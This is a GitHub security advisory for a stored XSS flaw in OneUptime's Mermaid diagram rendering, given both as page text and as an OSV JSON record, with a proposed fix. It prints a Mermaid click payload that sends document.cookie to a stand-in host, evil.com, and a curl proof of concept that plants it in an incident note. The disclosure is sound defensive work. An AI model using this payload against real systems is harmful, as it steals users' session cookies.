GHSA-WVH5-6VJM-23QH

Vulnerability from github – Published: 2026-03-13 20:00 – Updated: 2026-03-16 17:06
VLAI?
Summary
OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: "loose")
Details

Summary

The Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable.

Details

Mermaid configuration — Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx:76:

// MarkdownViewer.tsx:76
mermaid.initialize({
    securityLevel: "loose",  // Allows interactive event bindings
    // ...
});

The Mermaid documentation explicitly warns: securityLevel: "loose" allows click events and other interactive bindings in diagrams. The safe default is "strict" which strips all interactivity.

SVG injection via innerHTML — MarkdownViewer.tsx:106:

// MarkdownViewer.tsx:106
if (containerRef.current) {
    containerRef.current.innerHTML = svg;  // Raw SVG injection
}

After Mermaid renders the diagram to SVG, the SVG string is injected directly into the DOM via innerHTML. Combined with securityLevel: "loose", this allows event handlers embedded in the SVG to execute.

Mermaid XSS payload:

```mermaid
graph TD
    A["Click me"]
    click A callback "javascript:fetch('https://evil.com/?c='+document.cookie)"
```​

With securityLevel: "loose", Mermaid processes the click directive and creates an SVG element with an event handler that executes the JavaScript.

PoC

# Authenticate
TOKEN=$(curl -s -X POST 'https://TARGET/identity/login' \
  -H 'Content-Type: application/json' \
  -d '{"email":"user@example.com","password":"password123"}' \
  | jq -r '.token')

# Create an incident note with Mermaid XSS payload
curl -s -X POST 'https://TARGET/api/incident-note' \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  -H 'tenantid: PROJECT_ID' \
  -d '{
    "data": {
      "incidentId": "INCIDENT_ID",
      "note": "## Root Cause Analysis\n\n```mermaid\ngraph TD\n    A[\"Load Balancer\"] --> B[\"App Server\"]\n    click A callback \"javascript:fetch('"'"'https://evil.com/?c='"'"'+document.cookie)\"\n```",
      "noteType": "RootCause"
    }
  }'

# Any user viewing this incident note will have their cookies exfiltrated

# Verify the vulnerability in source code:

# 1. securityLevel: "loose":
grep -n 'securityLevel' Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx
# Line 76: securityLevel: "loose"

# 2. innerHTML injection:
grep -n 'innerHTML' Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx
# Line 106: containerRef.current.innerHTML = svg

Impact

Stored XSS in any markdown-rendered field. Affects:

  1. Incident notes/descriptions — viewed by on-call engineers during incidents
  2. Status page announcements — viewed by public visitors
  3. Monitor descriptions — viewed by team members
  4. Any markdown field — the MarkdownViewer component is shared across the UI

The "loose" security level combined with innerHTML injection allows arbitrary JavaScript execution in the context of the OneUptime application.

Proposed Fix

// 1. Change securityLevel to "strict" (default safe mode):
mermaid.initialize({
    securityLevel: "strict",  // Strips all interactive bindings
    // ...
});

// 2. Use DOMPurify on the SVG output before innerHTML injection:
import DOMPurify from "dompurify";

if (containerRef.current) {
    containerRef.current.innerHTML = DOMPurify.sanitize(svg, {
        USE_PROFILES: { svg: true, svgFilters: true },
        ADD_TAGS: ['foreignObject'],
    });
}
Severity ?
7.6 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "oneuptime"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "10.0.23"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32308"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:00:38Z",
    "nvd_published_at": "2026-03-13T19:54:42Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe Markdown viewer component renders Mermaid diagrams with `securityLevel: \"loose\"` and injects the SVG output via `innerHTML`. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid\u0027s `click` directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable.\n\n### Details\n\n**Mermaid configuration \u2014 `Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx:76`:**\n\n```typescript\n// MarkdownViewer.tsx:76\nmermaid.initialize({\n    securityLevel: \"loose\",  // Allows interactive event bindings\n    // ...\n});\n```\n\nThe Mermaid documentation explicitly warns: `securityLevel: \"loose\"` allows click events and other interactive bindings in diagrams. The safe default is `\"strict\"` which strips all interactivity.\n\n**SVG injection via innerHTML \u2014 `MarkdownViewer.tsx:106`:**\n\n```typescript\n// MarkdownViewer.tsx:106\nif (containerRef.current) {\n    containerRef.current.innerHTML = svg;  // Raw SVG injection\n}\n```\n\nAfter Mermaid renders the diagram to SVG, the SVG string is injected directly into the DOM via `innerHTML`. Combined with `securityLevel: \"loose\"`, this allows event handlers embedded in the SVG to execute.\n\n**Mermaid XSS payload:**\n\n```markdown\n```mermaid\ngraph TD\n    A[\"Click me\"]\n    click A callback \"javascript:fetch(\u0027https://evil.com/?c=\u0027+document.cookie)\"\n```\u200b\n```\n\nWith `securityLevel: \"loose\"`, Mermaid processes the `click` directive and creates an SVG element with an event handler that executes the JavaScript.\n\n### PoC\n\n```bash\n# Authenticate\nTOKEN=$(curl -s -X POST \u0027https://TARGET/identity/login\u0027 \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"email\":\"user@example.com\",\"password\":\"password123\"}\u0027 \\\n  | jq -r \u0027.token\u0027)\n\n# Create an incident note with Mermaid XSS payload\ncurl -s -X POST \u0027https://TARGET/api/incident-note\u0027 \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -H \u0027tenantid: PROJECT_ID\u0027 \\\n  -d \u0027{\n    \"data\": {\n      \"incidentId\": \"INCIDENT_ID\",\n      \"note\": \"## Root Cause Analysis\\n\\n```mermaid\\ngraph TD\\n    A[\\\"Load Balancer\\\"] --\u003e B[\\\"App Server\\\"]\\n    click A callback \\\"javascript:fetch(\u0027\"\u0027\"\u0027https://evil.com/?c=\u0027\"\u0027\"\u0027+document.cookie)\\\"\\n```\",\n      \"noteType\": \"RootCause\"\n    }\n  }\u0027\n\n# Any user viewing this incident note will have their cookies exfiltrated\n```\n\n```bash\n# Verify the vulnerability in source code:\n\n# 1. securityLevel: \"loose\":\ngrep -n \u0027securityLevel\u0027 Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx\n# Line 76: securityLevel: \"loose\"\n\n# 2. innerHTML injection:\ngrep -n \u0027innerHTML\u0027 Common/UI/Components/Markdown.tsx/MarkdownViewer.tsx\n# Line 106: containerRef.current.innerHTML = svg\n```\n\n### Impact\n\n**Stored XSS in any markdown-rendered field.** Affects:\n\n1. **Incident notes/descriptions** \u2014 viewed by on-call engineers during incidents\n2. **Status page announcements** \u2014 viewed by public visitors\n3. **Monitor descriptions** \u2014 viewed by team members\n4. **Any markdown field** \u2014 the MarkdownViewer component is shared across the UI\n\nThe \"loose\" security level combined with `innerHTML` injection allows arbitrary JavaScript execution in the context of the OneUptime application.\n\n### Proposed Fix\n\n```typescript\n// 1. Change securityLevel to \"strict\" (default safe mode):\nmermaid.initialize({\n    securityLevel: \"strict\",  // Strips all interactive bindings\n    // ...\n});\n\n// 2. Use DOMPurify on the SVG output before innerHTML injection:\nimport DOMPurify from \"dompurify\";\n\nif (containerRef.current) {\n    containerRef.current.innerHTML = DOMPurify.sanitize(svg, {\n        USE_PROFILES: { svg: true, svgFilters: true },\n        ADD_TAGS: [\u0027foreignObject\u0027],\n    });\n}\n```",
  "id": "GHSA-wvh5-6vjm-23qh",
  "modified": "2026-03-16T17:06:49Z",
  "published": "2026-03-13T20:00:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-wvh5-6vjm-23qh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32308"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OneUptime/oneuptime"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.23"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OneUptime: Stored XSS via Mermaid Diagram Rendering (securityLevel: \"loose\")"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.